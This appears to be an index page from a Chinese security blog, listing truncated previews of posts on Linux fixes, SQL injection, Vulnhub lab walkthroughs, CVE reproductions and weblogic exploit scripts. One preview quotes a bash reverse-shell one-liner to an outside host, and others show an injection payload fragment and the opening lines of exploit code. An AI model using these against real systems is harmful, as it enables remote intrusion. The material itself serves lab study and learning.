原创 centos linux7忘記root密碼,進行密碼重置

小編今天就忘記Linux root 用戶的口令,下面就由小編來教教大家如果忘記root口令怎麼辦 第1步:開機後在內核上按“e”。 第二步:按e以後會進入內核啓動頁面,在linux16這行的後面輸入“rd.break console=t

原创 Docker鏡像服務器內編輯文件報錯 bash: vim: command not found

小編今天在自己搭建的docker鏡像服務器內,本來想修改一下服務器裏面的某個配置文件的,但是,在編輯文件的過程中顯示報錯,具體顯示如下: root@haha:/# nano bash: nano: command not found

原创 幾種SQL注入(insert,update,delete,`, \ 等。。。)

insert注入: $sql = "insert into user(username,password) values('$username','$password',)"; payload: 適用於字符型:          ' or

原创 AI:WEB:02靶場題解

AI:WEB:02靶場題解 前期準備 鏡像下載 https://www.vulnhub.com/entry/ai-web-2,357/ 環境配置: 在VM以net連接打開虛擬機 使用的機器: 攻擊機:kali linux 靶機:i

原创 CVE-2019-11043遠程代碼執行漏洞復現

CVE-2019-11043遠程代碼執行漏洞復現 漏洞名稱: php fastcgi 遠程命令執行漏洞 漏洞類型: 遠程代碼執行漏洞 漏洞危害: 高危 漏洞來源: https://www.nginx.com/blog/php-fp

原创 AI:Web-1靶場題解

AI:Web-1靶場題解 前期準備 鏡像下載 https://www.vulnhub.com/entry/ai-web-1,353/ 環境配置: 在VM以net連接打開虛擬機 使用的機器: 攻擊機:kali linux 靶機:ip

原创 kali安裝教程及踩的坑

對於小編來說,這兩天真真是非常難受的。一直以來,小編得kali都是很友愛的童鞋幫小編安裝的,但是天道好輪迴,終究還是輪到小編我了。且說,這兩天小編都沒怎麼聽課,每節課都帶着筆記本,在老師的課堂上努力的安裝着kali。最終,小編自覺能力有限

原创 DC靶場1-6

靶機下載: https://download.vulnhub.com/dc/ 環境配置: 在VM以net連接打開虛擬機 使用的機器: 攻擊機:kali linux 靶機:DC1,2,4,5,6(IP隨配) DC1 1.nmap掃描

原创 Digitalworld.local: JOY Vulnhub靶場題解

前期準備 鏡像下載 https://www.vulnhub.com/entry/digitalworldlocal-joy,298/ 環境配置: 在VM以net連接打開虛擬機 使用的機器: 攻擊機:kali linux,ubunt

原创 fastjson復現

fastjson2017-0315遠程代碼執行漏洞復現 漏洞名稱: fastjson遠程命令執行漏洞 漏洞類型: 遠程代碼執行漏洞 漏洞危害: 高危 漏洞來源: https://github.com/alibaba/fastjso

原创 Postgres漏洞復現

Postgres漏洞匯現 CVE-2018-1058 漏洞名稱: 遠程代碼執行漏洞 漏洞類型: 遠程代碼執行 公佈時間: 2018-3-1 涉及應用版本: PostgreSQL https://www.securityfocus.

原创 SQL注入知識彙總

SQL注入 基礎篇 原理: SQL注入,意思就是指 輸入一條SQL語句,插入到代碼中,修改後臺SQL語句,使程序執行,進而達到進行攻擊的目的 常用的SQL語句: 選擇(select)語句 select * from table_

原创 weblogic CVE-2019-2725 pocsuite3的 poc

import re from collections import OrderedDict from urllib.parse import urljoin from pocsuite3.api import Output,POCBa

原创 常用的反彈shell的語句

shell編碼:http://www.jackson-t.ca/runtime-exec-payloads.html bash命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1          bash

原创 weblogic CVE-2019-2725 的一鍵腳本

# -*- coding: utf-8 -*- import requests import argparse class Exploit: def __init__(self, rhost, lport, lhost): se